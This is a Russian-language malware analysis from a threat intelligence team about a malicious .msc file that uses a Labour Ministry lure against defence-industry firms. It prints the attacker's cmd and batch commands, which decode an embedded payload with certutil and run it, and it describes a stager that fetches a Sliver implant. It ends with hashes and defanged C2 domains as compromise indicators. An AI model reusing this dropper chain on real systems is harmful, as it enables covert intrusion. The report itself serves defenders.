20 сентября специалисты F.A.C.C.T. Threat Intelligence обнаружили вредоносный файл «17_09_2024.msc», в процессе выполнения которого жертве демонстрировался интересный документ-приманка. Речь о письме Минтруда РФ директорам предприятий оборонно-промышленного комплекса. Изучая приманку, специалисты предположили, что за атакой с использованием этого файла стоит группа кибершпионов Sticky Werewolf — весной этого года они уже использовали похожий документ. Однако совокупность TTP и инфраструктурные особенности указывали на то, что первоначальная гипотеза могла быть ошибочной, а на самом деле за атакой стоит совершенно другой злоумышленник. В настоящий момент эксперты F.A.C.C.T. отслеживают эту активность под именем MimiStick. Подробностями поделились Артем Грищенко, ведущий специалист по анализу вредоносного кода, F.A.C.C.T., и Алена Шандер, аналитик группы исследования сложных угроз, F.A.C.C.T.
При открытии файла 17_09_2024.msc запускаются следующие команды:
«C:WindowsSystem32cmd.exe» /v /c set «k=%cd%17_09_2024.msc»&(IF NOT EXIST «!k!» (for /f «tokens=* usebackq» %g in (`where /R «%userprofile%» «17_09_2024.ms»?`) do set «k=%g»)>nul 2>&1)&set «f=r»&set «o=%localappdata%»&>nul ce!f!tutil -decode «»»!k!»»» !o!xrks.t&ren «!o!xrks.t» xrks.cmD&!o!xrks
where /R «C:Usersadmin» «17_09_2024.ms»?certutil -decode «»»C:UsersadminAppDataLocalTemp17_09_2024.msc»»» C:UsersadminAppDataLocalxrks.t
С помощью этих команд будет извлекаться упакованное содержимое файла «17_09_2024.msc». После распаковки будет создан файл %localappdata%xrks.t с командным файлом внутри. Его содержимое следующее:
@echo offSET «go=%~f0″set h=rset «td=%temp%»echo T > «%td%th.txt»findstr /b /l «VqQAAMAAAAEAAAA//8AALgAA» «%go%» >> «%td%th.txt»>nul ce%h%tutil.exe -decode «%td%th.txt» «%td%xkiq.txt»ren «%td%xkiq.txt» wqhe.exedel «%td%th.txt»start /b «» «%td%wqhe.exe» exit /b 0VqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAA[REDACTED]…
Далее выполняются 2 команды:
findstr /b /l «VqQAAMAAAAEAAAA//8AALgAA» «C:UsersadminAppDataLocalxrks.cmD»certutil.exe -decode «C:UsersadminAppDataLocalTempth.txt» «C:UsersadminAppDataLocalTempxkiq.txt»
Они нужны для того, чтобы обнаружить содержащуюся в конце bat-файла упакованную нагрузку. Нагрузка — это base64-строка, начинающаяся с подстроки «VqQAAMAAAAEAAAA//8AALgAA». Нагрузка декодируется и сохраняется в файл %Temp%xkiq.txt. Затем она переименовывается в %Temp%wqhe.exe, удаляется исходный файл th.txt, а файл wqhe.exe запускается.
Нагрузка содержит в ресурсах PDF-приманку, которая после запуска файла сохраняется в %Temp%17_09_2024_0.pdf и открывается. Содержимое приманки приведено на рисунке ниже.
Рис. 1. PDF-приманка из сентябрьской атаки MimiStick
Схожие приманки мы наблюдали в ряде атак группы Sticky Werewolf, например, приманка из атаки группы Sticky Werewolf от марта 2024 года приведена на рисунке ниже:
Рис. 2. PDF-приманка из мартовской атаки Sticky Werewolf
После открытия приманки нагрузка запускает содержащийся в себе зашифрованный шеллкод.
Нагрузка — стэйджер, который загружает и запускает вторую стадию с удаленного узла. В качестве второй стадии используется Sliver implant c С2: techitzone[.]ru:443.
Домен techitzone[.]ru зарегистрирован 2 сентября 2024 года.
Рис. 3. Информация о регистрации домена techitzone[.]ru
С этим доменом связаны несколько дополнительных, которые были зарегистрированы тем же атакующим и, вероятно, уже использовались или будут использоваться им в ближайшее время:
about-tech[.]ru – зарегистрирован 2023-12-07
orkprank[.]ru — зарегистрирован 2024-06-18
borosan[.]ru – зарегистрирован 2024-07-15
mysafer[.]ru – зарегистрирован 2024-07-05
rtxcore[.]ru — зарегистрирован 2024-09-02
min-trud-gov[.]ru – зарегистрирован 2024-09-23
Домен min-trud-gov[.]ru, мимикрирующий под домен Минтруда России, вызывает особый интерес, поскольку был зарегистрирован относительно недавно и совпадает по легенде с приманкой из сентябрьской атаки группы, обнаруженной в ходе этого исследования. Высока вероятность, что он будет использоваться злоумышленниками в ближайшее время для проведения фишинговых рассылок.
Индикаторы компрометации
Файловые индикаторы
Filename
17_09_2024.msc
MD5
0756de02dd3b4be840d31c8871148f7f
SHA-1
3100e869b1052dee920f7f2ca35da60abdf5aac0
SHA-256
5ad093aa3eaf2bb76003f8f2f9de9b1368640aa320fa8d77df2c773f75186a71
Filename
17_09_2024.pdf (приманка)
MD5
873454911a81a6c892838c44cbb3059b
SHA-1
3fba74f0f7f91f665ad68db9004f1fec3486595b
SHA-256
3877f9fd6b21ee735130421dcf997cf000ae66b20a1c6a490f23431b2f95fa90
Filename
xkiq.txt
MD5
7e151444c98ef2cf084eed8e6d4be807
SHA-1
2849ad434d55b8f2bc067c37903b5ff5bad01dbd
SHA-256
65096aa2895025d94b934eb4198ea160e067e8e5c97d9ea252cb2de3870b7b2f
Filename
xrks.t
MD5
5ed144351c41eb690d86c523690eb265
SHA-1
efd81a26fd43124d435bc0223c5f42839f793d42
SHA-256
8d83a598aa61a3f2e61bfdcdfc7b29b4c8d357eb43562d349053defa1ce50d78
Filename
stage2.exe
MD5
725e5068bd68c3d055f3a814f402a8be
SHA-1
e8ba03b13f9b51abcc9a539d09f98b61b2b4ccd0
SHA-256
ff16334c4cbbfed4bfca23436493397d0465c643cce6cbe41426067bb1ce14ff
Filename
1.7z
MD5
67aa63c4518a3604e37f89ad0d39a34d
SHA-1
c15716d127961eb1ca4c4d6192af6e1c5c8a2d8d
SHA-256
b262dd5373213c5af573a08b409f8142c7f9f92b19536d7d78b4515d23452321
Сетевые индикаторы
techitzone[.]ru
213.183.54[.]123
hxxps://213.183.54[.]123:8444/Inter-Regular.woff/-EEbEJB0DX9DBUIHJe0hJQOEOEKOlr-p4xEk6WSSs0tUfsCIdSqYB23qz_Pr_6TmAmEDhpyem74y-_Jv0fO3T12fkp7BqWUKHCqkECIyYA1OqhGzh9QFriVKGM0n3jnnc1Zqenuj-d2nDXL4aUmKRBO7jRdvO6BBXfxw4S
about-tech[.]ru
orkprank[.]ru
borosan[.]ru
mysafer[.]ru
rtxcore[.]ru
min-trud-gov[.]ru
Источник: habr.com
